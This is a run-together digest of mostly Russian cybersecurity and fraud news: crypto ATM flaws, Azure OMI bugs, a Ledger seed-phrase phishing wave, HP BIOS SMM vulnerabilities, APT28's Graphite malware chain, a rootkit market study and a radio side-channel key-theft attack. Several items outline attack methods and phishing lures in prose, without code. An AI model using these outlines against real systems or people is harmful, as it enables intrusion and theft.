В заключение исследователи отметили, что безопасность криптоматов BATM остается под вопросом из-за известных уязвимостей как в их аппаратном, так и в программном обеспечении. Kraken Security Labs рекомендует использовать только криптоматы BATMtwo, установленные в надежных местах.
[По данным Coin ATM Radar](https://coinatmradar.com/charts/manufacturer- share/), General Bytes - второй по величине производитель криптоматов, на долю которого приходится 22.7% мирового рынка. Напомним, что в июле общее число установленных криптоматов в мире превысило 24 000.
The Wiz Research Team recently found four critical vulnerabilities in OMI, which is one of Azure's most ubiquitous yet least known software agents and is deployed on a large portion of Linux VMs in Azure. The vulnerabilities are very easy to exploit , allowing attackers to remotely execute arbitrary code within the network with a single request and escalate to root privileges.
Many different services in Azure are affected, including Azure Log Analytics , Azure Diagnostics and Azure Security Center , as Microsoft uses OMI extensively behind the scenes as a common component for many of its management services for VMs.
Cloud no good maybe

Wiz Research recently found 4 critical vulnerabilities in OMI, which is one of Azure's most ubiquitous yet least known software agents and is deployed on a large portion of Linux VMs in Azure.
www.wiz.io
Владельцы аппаратных криптокошельков Ledger подверглись массовой фишинговой атаке. Мошенники отправляют поддельные уведомления от имени компании. В них говорится о необходимости проверить пароль под предлогом инцидента с нарушением безопасности.
Hey @Ledger someone has spoofed your REAL support email and is currently sending this to people to get them to expose their recovery phrase
For a company we're all forced to trust for custody of our assets, this is not a good look pic.twitter.com/9GIz6wJi3O
— Tony (@0xRacist) December 16, 2024Click to expand...
Письма содержат информацию о якобы утечке данных и просьбу проверить seed- фразу через поддельный сайт. Злоумышленники используют правдоподобные заголовки для рассылки, вроде «Security Alert: Data Breach May Expose Your Recovery Phrase», и подменяют адрес отправителя.
Сайт, куда перенаправляют ссылки из письма, выглядит как официальный, но при детальном рассмотрении оказывается зарегистрированным недавно и используется для кражи данных.
На поддельной странице пользователям предлагается ввести seed-фразу, после чего хакеры получают доступ к устройству. При вводе некорректной фразы система сообщает об ошибке, вынуждая пользователя повторять процесс, пока не будет получена правильная комбинация.
Отметим, что компания давно привлекает внимание хакеров. В ноябре 2024 года в онлайн-магазине приложений Microsoft Store [обнаружили](https://incrypted.com/haker-ukral-768-000-pri-pomoshi-fejk- prilozheniya-ledger-live/) поддельный клиентский интерфейс Ledger Live. Разработчикам фейкового ПО удалось заполучить $768 000.
Помимо этого, в конце 2023 года представители Ledger [признали](https://incrypted.com/v-ledger-ustranyly-eksplojt-ceo-kompanyy- prokommentyroval-sytuatsyju/) компрометацию библиотеки, которая использовалась для работы децентрализованных приложений. В качестве источника проблем разработчики указали фишинговую атаку на одного из сотрудников.
В последствии CEO Ledger Паскаль Готье заявил, что эксплойт полностью устранили, а взломанную библиотеку заменили. По словам главы компании, это был «досадный инцидент».
На этот раз ограничения коснутся веб-сайтов с инструкциями по обходу блокировок.
Госдума в очередной раз пытается ограничить доступ россиян к независимой информации в интернете. Для этого депутаты решили использовать так и не принятый законопроект пятилетней давности, изначально направленный на регулирование новостных агрегаторов. Однако теперь в него добавлена поправка, запрещающая распространение информации о способах обхода интернет-блокировок.
Автором инициативы выступил Антон Горелкин, депутат Госдумы из фракции «Единая Россия». По его словам, речь идёт не о запрете VPN, а лишь о недопущении рекламирования обходных путей. Однако эксперты опасаются, что на практике это как раз и может привести к полной блокировке VPN-сервисов и других инструментов для сохранения доступа к заблокированным ресурсам.
Кроме того, законопроект вводит ряд дополнительных ограничений. В частности, он обязывает российские предприятия и учреждения использовать услуги хостинг- провайдеров из специального реестра, курируемого Роскомнадзором. Эти провайдеры должны будут оперативно выполнять любые предписания ведомства, а в ином случае могут быть исключены из реестра и потерять возможность оказывать свои услуги на территории страны.
По мнению экспертов, эти меры направлены на дальнейшую «суверенизацию» российского интернета и контроль над информационными потоками. А запрет на информацию об обходе блокировок фактически лишит россиян доступа к надёжным инструментам защиты приватности в сети.
«Охота на VPN уже началась в серой зоне, и теперь такие воины режима, как депутат Горелкин, пытаются всё это узаконить задним числом и ввести полный законодательный запрет на использование бронейбойных систем защиты информации и восстановления доступа к информации», — считает Саркис Дарбинян, ведущий юрист правозащитной организации «Роскомсвобода».
Таким образом, депутаты в очередной раз пытаются ограничить интернет в России и лишить людей свободного доступа к информации. Пока эксперты открыто выступают против инициативы, простым гражданам остаётся лишь ждать и надеяться на лучшее.
GitHub [опубликовал отчёт](https://github.blog/2022-08-16-2022-transparency- report-january-to-june/), в котором отражены уведомления о нарушении интеллектуальной собственности и публикации незаконного содержимого, поступившие за первую половину 2022 года. Ранее подобные отчёты публиковались ежегодно, но теперь GitHub перешёл на раскрытие информации раз в полугодие. В соответствии с действующим в США Законом об авторском праве в цифровую эпоху (DMCA, Digital Millennium Copyright Act), в первой половине 2022 года GitHub получил 1200 требований о блокировке. От владельцев репозиториев поступило 20 опровержений на неправомерную блокировку.
Из-за получения жалоб на нарушения условий использования сервиса, не связанных с DMCA, GitHub скрыл 44913 учётных записей, из которых 356 впоследствии были восстановлены. Блокировка доступа владельца учётной записи были предпринята в 268 случаях (16 учётных записей затем были разблокированы). Для 2617 учётных записей одновременно были применены и блокировка и скрытие (восстановлены затем были 54 учётных записей). В разрезе проектов было отключено 1766 проектов и возвращено только 4.
GitHub также получил 212 запросов о раскрытии данных пользователей (для сравнения за первое полугодие 2021 года было получено 172 запросов). 122 подобных запроса было отправлено в форме судебных повесток (118 криминальных дел и 4 гражданских), 56 - судебных постановлений и 10 ордера на обыск. 98.1% запросов были отправлены правоохранительными органами, а 1.9% по гражданским искам. Удовлетворено 169 запросов из 212, в результате чего раскрыты сведения о 1361 учётной записи. Пользователи были уведомлены о раскрытии их данных только 3 раза, так как оставшиеся 166 запросов были снабжены предписанием о неразглашении информации (gag order).
От государственных служб поступило три требования удаления контента из-за
нарушений локальных законодательств, два из которых были получены из России и
одно из Австралии. Запросы из России были отправлены Роскомнадзором и связаны
с блокировкой деятельности online-казино.
Определённое число запросов также поступило от спецслужб США в рамках закона о
негласном наблюдении в целях внешней разведки, но точное число запросов данной
категории не подлежит разглашению, сообщается только, что подобных запросов
меньше 250 и они затрагиванию менее 250 учётных записей. 22 запроса на
раскрытие данных поступило от иностранных правоохранительных органов (по
одному из Аргентины, Эстонии, Франции, Сан Марино, Испании и Швейцарии 2 из
Бразилии и 15 из Индии).
За отчётный период в GitHub поступило 464 апелляции (для сравнения за первое полугодие 2021 года - 591) о необоснованных блокировках при выполнении требований по ограничению экспорта в отношении территорий (Крым, ДНР, ЛНР Иран, Куба, Сирия и Северная Корея), подпадающих под санкции США. 355 апелляции были приняты, 103 отклонены и 6 возвращены с запросом дополнительных сведений.
Hotbit suspend deposit, withdrawal and trading over website and its app.
we regret to inform you that Hotbit will have to suspend trading, deposit, withdrawal and funding functions, the exact time of resumption cannot be determined at the moment.
The reason is that a former Hotbit management employee who left Hotbit in April this year was involved in a project last year(which was against Hotbit's internal principles and of which Hotbit was unknown) that law enforcement authorities now think is suspected of violating criminal laws. So, a number of Hotbit senior managers have been subpoenaed by law enforcement since the end of July and are assisting in the investigation. Furthermore, law enforcement has frozen some funds of Hotbit, which has prevented Hotbit from running normally.
Hotbit and the rest of the employees of Hotbit's management are not involved in the project and have no knowledge of the illegal information involved in the project. However, we are still actively cooperating with the law enforcement authorities in their investigations and are continuously communicating with them through our lawyers and applying for the release of the frozen assets. The assets of all users are safe on Hotbit.
Hotbit will resume normal service as soon as the assets are unfrozen. All user's assets and data on Hotbit are secure and correct.
Hotbit is working hard to continue to cooperate and follow up on the progress of the investigation by law enforcement authorities, and will announce the results of the investigation as soon as they are available.
source: hotbit.zendesk.com/hc/en-us/articles/8074249353495
Роскомнадзор (РКН) планирует использовать инновационное программное обеспечение для защиты IT-инфраструктуры российских компаний от хакерских атак. Главный радиочастотный центр (ГРЧЦ), подведомственный РКН, закупил лицензию на использование программного обеспечения, которое создает ложные приманки и ловушки для хакеров. Об этом [сообщает](https://www.vedomosti.ru/technology/articles/2024/12/19/1082273-roskomnadzor- rasstavit-lovushki-dlya- hakerov?utm_source=yxnews&utm_medium=desktop&utm_referrer=https%3A%2F%2Fdzen.ru%2Fnews%2Finstory%2Fe1d31406-a778-54f5-8957-e5e189bfd091) издание «Ведомости».
Поставщиком решения стал российский разработчик в сфере информационной безопасности «Ангара ассистанс», который будет предоставлять программу Xello Deception за 13,1 млн рублей. В результате в инфраструктуре ГРЧЦ появится десяток серверов-ловушек с сотнями устройств, имитирующих реальные.
Программа Xello Deception нужна для обеспечения информационной безопасности предприятия, пояснил представитель РКН. Xello Deception – российская компания, выпускающая одноименный софт класса DDP, который используется для введения в заблуждение хакеров, получивших доступ к защищаемой инфраструктуре.
Подобный софт имитирует элементы инфраструктуры, которые для хакера выглядят как реальные. Когда киберпреступник попытается получить доступ к ресурсам предприятия, система его перенаправит на ловушку – ложный сервис, фейковую базу данных или сервер-ловушку. Подобный подход отвлекает злоумышленников от реальных целей и замедляет их работу внутри сети. Чем дольше злоумышленник отвлекается от реального взлома, тем выше шанс на его обнаружение и нейтрализацию.
30-летний капитан юстиции Екатерина Олейник работала следователем, а в 2020-ом году ушла в декрет и занялась инфоцыганством. Решила подзаработать в свободное время, устроилась в онлайн-школу «наставником». Business cool обещала ученикам почти чудо: за 4500 рублей освоить аж 25 вымышленных востребованных профессий. Там и курс по рилсам, и по созданию стикеров, и мини-курс «упаковка профиля», «прогревы в продажах» и «распаковка».
Дела шли хорошо, Екатерина продавала обучение через запрещенную сеть, помогала фрилансерам. Пока ее доходами не заинтересовались коллеги-следователи: оказалось, на ее счету откуда-то взялись 2,6 млн, которые ей точно не платили на службе. Девушку уволили со службы, дело направили следователям — теперь ей грозит срок за незаконное предпринимательство.
Николай Евдокимов, по версии следствия, причинил ущерб ФСС на сотни миллионов рублей.
По данным из издания «Коммерсантъ», один из главных IT-специалистов Фонда социального страхования (ФСС) России, Николай Евдокимов, участвовавший в разработке и создании единой интегрированной информационной системы (ЕИИС) «Соцстрах», проведет семь лет в колонии. Следствие утверждает, что после увольнения из фонда программист зарегистрировал на свою организацию права на 46 подсистем НИИС, что, по их мнению, привело к ущербу в сотни миллионов рублей для ФСС. Николай Евдокимов отказывается признать свою вину, а его защита утверждает, что права на результаты интеллектуальной деятельности не могут быть предметом хищения.
Процесс по делу 55-летнего Николая Евдокимова, обвиняемого в особо крупном мошенничестве (часть 4 статьи 159 УК РФ), рассматривалось в Дорогомиловском райсуде Москвы с конца предыдущего года.
В течение шести лет с февраля 2003 года Николай Евдокимов занимал руководящие должности в ФСС. Его карьера началась с должности замначальника отдела программного обеспечения Департамента информационного обеспечения, а завершилась как заместитель руководителя Департамента эксплуатации и технического обслуживания информационных технологий.
При этом до прихода в ФСС и после увольнения из него Евдокимов был генеральным директором ООО «Открытые информационные технологии» (позже — «Нист»), организации-разработчика ЕИИС «Соцстрах». Одним из ключевых направлений работы IT-специалиста была установка, сопровождение и обеспечение работоспособности программ общего пользования и подсистем ЕИИС в ФСС.
По некоторым данным, имея доступ к исходным кодам «Соцстраха» и будучи программистом по профессии, он мог вносить любые изменения в систему, выявить которые другим сотрудникам фонда было практически невозможно.
В 2014 году Евдокимов зарегистрировал на «Нист» исключительные права на программы подсистемы ЕИИС. По оценкам экспертов, ущерб от этого действия составил от 213 до 310 млн рублей. ФСС предъявила к Евдокимову гражданский иск о возмещении ущерба с требованием об аресте всех зарегистрированных на его компанию программ и признании недействительной государственной регистрации программ для ЭВМ — 46 подсистем ЕИИС «Соцстрах».
Евдокимов остался при своей позиции во время следствия и суда - он не признал своей вины. Тем не менее суд решил, что участие в мошенничестве подтверждается предоставленными доказательствами, и приговорил его к семи годам лишения свободы, а также наложил штраф в размере 500 тысяч рублей. Ему также запретили в течение двух лет занимать должности, связанные с организационными и административными функциями. Евдокимов был арестован прямо в зале суда и отправлен под стражу в СИЗО.
Адвокат Мария Зазирная, представляющая интересы Евдокимова, считает «приговор противоречащим закону и здравому смыслу». Она указывает на тот факт, что ФСС РФ на протяжении девяти лет распоряжается отсутствующими у него исключительными правами на программы, входящие в ЕИИС «Соцстрах», путем заключения лицензионных договоров с исполнителями по госконтрактам на модернизацию ЕИИС. «То есть совершает многомиллиардное необоснованное расходование бюджетных средств»,— подчеркнула Зазирная. Она также напомнила, что еще в 2018 году тот же Дорогомиловский суд постановил вернуть уголовное дело прокурору, в том числе по причине отсутствия описания в обвинении того, что и как у потерпевшего похищено. При этом использовалась ссылка на решение арбитражного суда 2014 года о том, что ФСС РФ является правообладателем программ, несмотря на их регистрацию в реестре Роспатента на другое лицо.
«До тех пор пока это решение арбитражного суда не отменено, не может быть признано и то, что ФСС РФ утратил права на программы»,— считает адвокат
Адвокат убеждена, что исключительные права на результаты интеллектуальной собственности не могут быть предметом хищения. «Поэтому данный приговор представляет собой пример игнорирования закона»,— заключила адвокат.
Николай Евдокимов - не первый высокопоставленный сотрудник ФСС РФ, который был привлечен к уголовной ответственности за хищение прав на программы фонда. Как известно из публикации «Ъ», Сергей Ковалевский, бывший советник главы ФСС РФ и затем зампред, отвечавший за информатизацию ведомства и надзор за деятельностью Николая Евдокимова, также был обвинен в злоупотреблении полномочиями и покушении на мошенничество (статьи 285 и 159 УК РФ). Обвинения в отношении Ковалевского появились в 2013 году, и с тех пор начался юридический спор между Фондом и Ковалевским. В итоге ФСС выиграла спор в арбитраже в 2014–2015 годах. Споры были связаны с цифровизацией фонда и созданием системы "Соцстрах". Ковалевский в 2005 году получил на себя права использования системы, но при этом утаил от ФСС и от Роспатента, что алгоритм системы был запатентован еще в 1991 году. Согласно данным следствия ФСБ, Ковалевский успел получить около 3,7 миллиарда рублей бюджетных средств, а после увольнения пытался, однако неудачно, получить еще 1,7 миллиарда. Ковалевский признал свою вину в злоупотреблениях, и дело было прекращено из-за истечения сроков давности. Решение суда по второму обвинению он не услышал, так как скоропостижно скончался весной этого года.
source:
kommersant.ru/doc/6172699
kommersant.ru/doc/5913543
Про-палестинские #хактивисты #GhostSec утверждают, что взломали 55 программируемых логических контроллеров (ПЛК) Berghof, используемых израильскими организациями.

](https://thehackernews.com/2022/09/palestinian-hacktivist-group- ghostsec.html)
Pro-Palestinian hacktivist group GhostSec claims to have compromised 55 Berghof programmable logic controllers (PLCs) used by Israeli organizations.
 thehackernews.com
Хакеры также утверждают, что получили доступ к другой панели, которая может быть использована для изменения уровня хлора и pH в воде.
Бразильская платформа криптовалютного кредитования BlueBenx приостановила вывод средств пользователей и сократила большую часть сотрудников. Это стало результатом взлома на сумму $32 млн.
Деталей взлома представители BlueBenx не сообщают. Однако некоторые участники криптосообщества предполагают, что средства были украдены в результате мошеннический действий со стороны руководства компании.
Ранее платформа BlueBenx привлекла более 22 000 пользователей обещаниями огромных прибылей. Пользователям обещали до 66% прибыли за депозит криптовалют.
«Думаю, есть высокая вероятность мошенничества – вся эта история об атаке хакеров выглядит как полная чушь, они ее просто выдумали», – рассказал один из инвесторов платформы местному изданию Portal do Bitcoin.
Похожий сценарий уже реализовывался неоднократно – криптовалютные компании обещали значительный доход пользователям, однако после сбора средств руководство компании попросту сбегало с деньгами инвесторов.
Вслед за недавними исправлениями целых наборов уязвимостей в UEFI производитель компьютеров HP выпускает новое обновление BIOS.
На этот раз поводом послужили две серьезные уязвимости, затрагивающие широкий спектр в более чем 200 моделях ПК и ноутбуков, которые позволяют запускать код с привилегиями ядра, включая управление драйверами и доступ к BIOS.
Уязвимости отслеживаются как CVE-2021-3808 и CVE-2021-3809, и имеют базовую оценку CVSS 8,8. На данный момент HP [не раскрывает](https://support.hp.com/us- en/document/ish_6184733-6184761-16/hpsbhf03788) технических подробностей, заявляя лишь, что в число уязвимых продуктов входят бизнес-ноутбуки Zbook Studio, ZHAN Pro, EliteBook, ProBook и Elite Dragonfly, настольные ПК EliteDesk и ProDesk, компьютеры PoS Engage, рабочие станции Z1 и Z2 и тонкие клиентские ПК.
Баги были обнаружены еще ноябре 2021 года благодаря исследователю Николасу Старке, который [пояснил в своем блоге](http://nstarke.github.io/uefi/smm/2022/05/10/smm-callout-in-hp- products.html), что уязвимость может позволить злоумышленнику, работающему с привилегиями уровня ядра (CPL == 0), повысить привилегии до режима управления системой (SMM). При этом SMM дает злоумышленнику полные привилегии над хостом для дальнейших атак.
Проблема заключается в том, что обработчик SMI может запускаться из среды ОС, например, через драйвер ядра Windows. Поэтому злоумышленнику необходимо найти адрес памяти функции LocateProtocol и перезаписать его вредоносным кодом. Он может инициировать выполнение кода, дав на это команду обработчику SMI.
Для использования уязвимости злоумышленнику необходимо иметь привилегии уровня root/SYSTEM в целевой системе и выполнять код в режиме управления системой (SMM). Кроме того, yекоторые модели компьютеров HP имеют средства защиты, которые злоумышленнику необходимо для обойти, чтобы эксплойт сработал, например, система HP Sure Start, которая отключит хост при повреждении памяти.
При достижении конечной цели злоумышленник, перезаписав UEFI (BIOS), может добиться устойчивого закрепления вредоносного ПО на машине, которое невозможно будет впоследствии удалить с помощью антивирусных средств или переустановки ОС.
Так что, всем владельцам железа НР, не желающим стать частью операций АРТ, практикующих атаки посредством UEFI, рекомендуем обновить BIOS, пока его не обновили без вашего участия.
Схема была простой: брали предоплату за товар и блокировали клиентов.
В Полтавской области прикрыли деятельность мошенников, которые продавали явную технику и новогодние елки через фейковые интернет-магазины. Об этом информирует пресс-служба Нацполиции области.
Оперативники отдела киберполиции Полтавщины совместно со следователями отдела расследования особо тяжких преступлений Следственного управления полиции области установили, что специально созданные для фиктивных Интернет-магазинов сайты сообщники рекламировали через известные социальные сети и вебресурсы. Фиктивные магазины существовали всего несколько дней, а каждый вновь созданный отличался от предыдущего незначительной видоизмененной названия, другим контактным телефоном и новым номером банковской карты для оплаты услуг.
Как сообщил Евгений Рогачев, начальник полиции Полтавщины, во избежание разоблачения мобильный номер клиента сообщники сразу после удачной сделки добавляли в «Черный список», блокируя его возможность связаться с продавцом.
Полковник полиции Полтавщины отметил: "Во время обысков по адресам проживания фигурантов изъята компьютерная техника, более десятка мобильных телефонов, более половины сотни банковских карт, флеш-накопители, более десятка сим-карт различных операторов мобильной связи, наличные в национальной и иностранной валюте. Одному из фигурантов уже вручили подозрение в мошенничестве, совершенном по предварительному сговору группой лиц, путем незаконных операций с использованием электронно-вычислительной техники. В то же время следователи, при процессуальном руководстве Полтавской областной прокуратуры, готовят материалы для сообщения о подозрении другим двум сообщникам ".
Задержанными оказались трое мужчин в возрасте 23 лет. Двое жителей Полтавщины, один из Харьковской области.
Атаки предположительно связаны с группировкой APT28.
Высокопоставленные правительственные чиновники и крупные компании оборонной промышленности в Западной Азии стали целью вредоносной кампании с использованием вредоносного ПО Graphite.
По словам специалистов из компании Trellix (появившейся в результате слияния McAfee Enterprise и FireEye), кампания проводилась с октября по ноябрь прошлого года и была разделена на несколько этапов с целью избежать обнаружения. Цепочка заражения началась с загрузчика Microsoft Excel, использующего уязвимость в MSHTML (CVE-2021-40444) для выполнения кода в памяти, и продолжилась вредоносным ПО под названием Graphite.
Как предполагают исследователи, атаки могут быть связаны с группировкой APT28 (также известной как Fancy Bear, Pawn Storm, Sednit, Strontium и Tsar Team). Основываясь на анализе многочисленных артефактов, связанных с этими атаками, исследователи выявили совпадения с более старыми образцами вредоносного ПО группировки APT28. Тем не менее эксперты не нашли однозначных свидетельств того, что кампания связана с данными злоумышленниками.
Киберпреступники настроили командный сервер Empire в июле 2021 года. Вредоносное ПО Graphite использует в качестве командного сервера OneDrive и использует Microsoft Graph API для подключения к нему.
Файл Microsoft Excel, предположительно отправленный жертвам по электронной почте, использовался для эксплуатации уязвимости удаленного выполнения кода в MSHTML и дальнейшего запуска вредоносного DLL-файла, который извлекал и запускал вредоносное ПО Graphite.
На четвертом этапе атаки выполнялись различные процессы для загрузки агента Empire на устройство жертвы. Пятым этапом атаки являлся Empire PowerShell C#, за которым следовал этап Empire HTTP PowerShell.
Атаки были нацелены на правительственные организации и частных лиц, связанных с оборонной промышленностью в Азии. Однако, эксперты предполагают, что целью атак могли стать Польша и другие страны Восточной Европы.
Эксперты Positive Technologies проанализировали наиболее известные за последние 10 лет семейства руткитов — программ, позволяющих скрыть в системе присутствие вредоносного программного обеспечения или следы пребывания злоумышленников. Исследование показало, что 77% руткитов используются киберпреступниками для шпионажа.
Руткиты — не самое распространенное вредоносное ПО. Случаи обнаружения руткитов, как правило, отсылают к громким атакам с резонансными последствиями — зачастую данные утилиты входят в состав многофункционального вредоносного ПО, которое перехватывает сетевой трафик, шпионит за пользователями, похищает сведения для аутентификации или использует ресурсы жертв для проведения DDoS- атак. Наиболее известный случай применения руткита в атаках — кампания по распространению вредоносного ПО Stuxnet, главной целью которой была приостановка развития ядерной программы Ирана.
Аналитики Positive Technologies провели масштабное исследование руткитов, используемых злоумышленниками за последние десять лет — начиная с 2011 года. Согласно полученным данным, в 44% случаев злоумышленники использовали руткиты в атаках на госучреждения. Чуть реже (38% случаев) эти вредоносы применялись для атак на исследовательские институты. Эксперты связывают выбор этих целей с основным мотивом киберпреступников, распространяющих руткиты, — получением данных. Так, большую ценность для злоумышленников представляет информация, которую обрабатывают эти организации. В топ-5 наиболее атакуемых посредством руткитов отраслей по итогам исследования также вошли телеком (25%), промышленность (19%) и финансовые организации (19%). Помимо этого, более половины руткитов (56%) используются хакерами в атаках на частных лиц. Главным образом это таргетированные атаки в рамках кампаний по кибершпионажу в отношении высокопоставленных чиновников, дипломатов и сотрудников целевых организаций.
«Руткиты, особенно работающие в режиме ядра, очень сложны в разработке, поэтому их используют либо высококвалифицированные APT-группировки, которые обладают навыками разработки подобного инструмента, либо группы, чьи финансовые возможности позволяют купить руткиты на теневом рынке, — поясняет аналитик Positive Technologies Яна Юракова. — Основная цель злоумышленников такого уровня — кибершпионаж и получение данных. Это могут быть как финансово мотивированные преступники, которые похищают крупные суммы денег, так и группировки, добывающие информацию и совершающие разрушительные действия в инфраструктуре жертвы в интересах заказчиков».
Как показал анализ, исследованные семейства руткитов в 77% случаев использовались злоумышленниками для получения данных, примерно в трети случаев (31%) — для извлечения финансовой выгоды, и лишь в 15% атак эксперты отметили мотив эксплуатации инфраструктуры компании-жертвы для проведения последующих атак.
Согласно отчету Positive Technologies, на теневых форумах в основном преобладают объявления о продаже руткитов пользовательского уровня — их обычно используют в массовых атаках. По оценкам экспертов компании, стоимость готового руткита варьируется от 45 до 100 000 долл. США и зависит от режима работы, целевой ОС, условий использования (например, вредонос можно взять в аренду на месяц) и дополнительных функций (чаще всего запрашивают получение удаленного доступа и сокрытие файлов, процессов и сетевой активности). В некоторых случаях разработчики предлагают доработку руткита под нужды заказчика и оказывают сервисное сопровождение. Стоит отметить, что в 67% объявлений фигурировало требование о том, что руткит должен быть «заточен» под Windows. Это коррелирует с результатами исследования: доля таких образцов в выборке вредоносов, изученных специалистами Positive Technologies, также превалирует, составляя 69%.
«Несмотря на сложности разработки этих зловредов, каждый год мы отмечаем появление новых версий руткитов, чей механизм работы отличается от уже известных вредоносов. Это говорит о том, что киберпреступники продолжают развивать инструменты, позволяющие маскировать вредоносную активность, и постоянно придумывают новые техники обхода средств защиты — появляется новая версия Windows, и сразу же разработчики вредоносов создают руткиты, ориентированные под нее, — комментирует Алексей Вишняков, руководитель отдела обнаружения вредоносного ПО экспертного центра безопасности Positive Technologies. — Мы ожидаем, что руткиты продолжат использовать хорошо подготовленные APT-группировки, а значит, речь идет уже не просто о компрометации данных и извлечении финансовой выгоды, а о сокрытии сложных целенаправленных атак, результатом которых может быть реализация недопустимых для организаций событий — от вывода из строя объектов КИИ, таких как атомные станции, ТЭЦ и электросети, до техногенных катастроф, вызванных авариями на промышленных предприятиях, и случаев политического шпионажа».
Чтобы обезопасить свою компанию от атак с использованием руткитов, специалисты Positive Technologies рекомендуют использовать средства обнаружения вредоносной активности на конечных узлах и решения типа PT Sandbox, которые позволяют выявить вредоносную программу как на этапе установки, так и в процессе работы. Обнаружить руткиты также поможет сканер руткитов, проверка целостности системы и анализ сетевого трафика на предмет аномалий.
1. Было проанализировано 16 наиболее известных семейств руткитов, обнаруженных за последние 10 лет.
2. Вид руткитов, имеющих те же привилегии, что и ОС. Сложность их разработки связана с тем, что любые ошибки в исходном коде могут повлиять на стабильность системы, что поспособствует обнаружению ВПО. Доля этих руткитов в выборке Positive Technologies составила 38%.
3. Атака типа advanced persistent threat (APT-атака) — многоэтапная, тщательно спланированная и организованная кибератака, направленная на отдельную отрасль или конкретные (как правило, крупные) компании. За APT- атакой стоят преступные группировки (APT-группировки), участники которых отличаются высоким уровнем квалификации.
4. Было проанализировано десять наиболее активных русскоязычных и англоязычных форумов в дарквебе, где представлены предложения по продаже и запросы на покупку руткитов, а также объявления о поиске разработчиков вредоносов.
5. Вид руткитов, работающих с теми же привилегиями, что и большинство приложений: могут перехватывать системные вызовы и подменять значения, возвращаемые API. Их доля в выборке — 31%.
• Source: [https://www.ptsecurity.com/ru-ru/ab...sudarstvennye-i- obrazovatelnye-uchrezhdeniya/](https://www.ptsecurity.com/ru- ru/about/news/issledovanie-positive-technologies-kak-hakery-skryvayut-sledy- atak-na-gosudarstvennye-i-obrazovatelnye-uchrezhdeniya/)
Исследователи из штата Джорджия обнаружили, что одна из технологий для защиты данных на недорогих телефонах, может позволить злоумышленникам украсть их.
Их документ, представленный 10 сентября на 6-м Европейском симпозиуме IEEE по безопасности и конфиденциальности, демонстрирует успешные атаки на два разных типа недорогих телефонов под управлением Android: ZTE Zfive и Alcatel Ideal.
В соответствии со стандартной практикой исследователи сообщали о своих выводах разработчикам программного обеспечения перед публикацией результатов, чтобы проблему можно было исправить.
Атака основана на размещении радиодатчика в пределах нескольких сантиметров от устройства, достаточно близко, чтобы обнаруживать слабые радиоволны, которые случайно испускаются процессором телефона.
Наблюдая за единственной защищенной веб-транзакцией, передаваемой в этих сигналах, злоумышленник может выяснить секретный ключ пользователя, форму цифрового пароля, который используется для шифрования его данных.
«Это потенциально мощная атака, которая фактически помогает украсть ключ, может быть проведена в реальных условиях», - сказал Милош Првулович, профессор компьютерных наук Технологического института Джорджии и соавтор исследования.
«Сколько раз вы клали телефон на стол в аэропорту и не проверяли, что находится под стойкой?» К счастью, исследователи нашли относительно простое решение.
В настоящее время это исправление находится в разработке. Если исследователям удастся выяснить, как заставить атаку работать на высокопроизводительных телефонах, то такая же уязвимость будет обнаружена на миллиардах наиболее широко используемых современных устройств.
Взлом телефона через побочный канал
Секретные ключи или ключи шифрования часто используются для защиты пользовательских данных. Как только злоумышленник получает доступ к ключам шифрования пользователя, он может подделать «цифровую подпись» и получить доступ, например, к банковским данным.
Поскольку недавно обнаруженная атака должна работать на большом количестве телефонов при повседневном использовании, ожидается, что она потребует незамедлительного внесения поправок в соответствующие стандарты безопасности RFC 7748.
Атака нацелена на стандартный процесс шифрования, используемый в широком спектре онлайн-операций, таких как вход в виртуальную частную сеть (VPN), создание безопасного веб-соединения с банком или электронную подпись цифрового документа.
Во время этого процесса две конечные точки в сети, например два телефона, должны обмениваться серией сообщений для проверки идентичности друг друга.
Если они не могут подтвердить, что они те, кем они себя называют, значит, они знают, что не следует отправлять личные данные. Подтверждение личности означает выполнение определенного алгоритма шифрования. Этот алгоритм включает в себя серию операций с секретным ключом, называемым «одноразовым кодом», который может быть представлен в виде двоичного числа, последовательности единиц и нулей или «битов». При каждой операции, которую выполняет процессор телефона, он излучает слабый радиосигнал, в тысячи раз более слабый, чем сигнал передатчика Wi-Fi. Эти сигналы называются излучением "побочного канала", поскольку они не исходят из основных каналов, используемых телефоном для связи.
Много лет назад исследователи поняли, что эти побочные выбросы могут привести к утечке значения nonce. Например, алгоритм шифрования может потребовать дополнительных шагов обработки, когда бит одноразового номера равен единице, что заставляет процессор излучать более продолжительный сигнал для этих битов. Отслеживая структуру более длинных и более коротких излучений, которые исходят от телефона во время обработки одноразового номера, злоумышленник может восстановить значение каждого из его битов. Оттуда они могут взломать шифрование пользователя.
Другие исследователи изобрели решение этой проблемы, известное как алгоритм «постоянного времени». Этот алгоритм гарантирует, что процессор выполняет одинаковую последовательность операций для каждого бита. Следовательно, радиоизлучение для каждого бита неразличимо, и одноразовый номер не может быть восстановлен. Этот алгоритм был кодифицирован в стандартах шифрования, таких как RFC 7748, и получил широкое распространение.
Нарушение алгоритма постоянного времени
В новой работе исследователи обнаружили проблему с алгоритмом постоянного времени.
Одна конкретная операция, которая выполняется для каждого бита, называемая «условной заменой», имеет характерную особенность. Когда операция выполняется над битом со значением единицы, процессор излучает немного более сильный радиосигнал.
Исследователи поняли, что если злоумышленник может просканировать излучения во время этой операции, каждый раз, когда она происходит, они могут определять одноразовый номер. Трудно было выяснить, могут ли они сосредоточиться на конкретной радиосигнатуре условного обмена, скрытой в последовательности многих других излучений.
Кроме того, из-за высокой скорости обработки данных в современных телефонах радиосигнал условного обмена длится недолго. Но, как выясняется, именно алгоритм постоянного времени, предназначенный для защиты от атак по побочным каналам, в первую очередь позволяет атаке работать. Ключевым моментом для исследователей было тщательное наблюдение за излучением телефона. Из-за алгоритма постоянного времени эти выбросы чрезвычайно регулярны.
Каждый раз, когда телефон обрабатывает небольшую часть данных, имеет место одна и та же общая картина излучения. Таким образом, исследователи могут автоматизировать процесс выделения крошечной части выбросов, соответствующей условному обмену, например, научиться определять небольшой логотип на быстро движущемся вагоне поезда, наблюдая за достаточным количеством проезжающих вагонов. Оттуда исследователи смогли измерить мощность излучения, чтобы определить, был ли каждый бит нулем или единицей, и таким образом восстановить весь одноразовый номер.
Атака работает настолько эффективно, что исследователи обнаружили, что для кражи секретного ключа телефона им достаточно было просканировать только одну защищенную транзакцию.
«Если кто-то может поднести зонд или антенну достаточно близко, - сказал Првулович, - мы можем получить ваш ключ сейчас».
Чтобы решить эту проблему, исследователи изменили алгоритм постоянного времени, чтобы сигнал, соответствующий условному свопу, имел одинаковую силу независимо от значения бита.
После того, как разработчики внедрят это исправление в криптографические библиотеки, такие как OpenSSL, алгоритм постоянного времени снова станет безопасным.
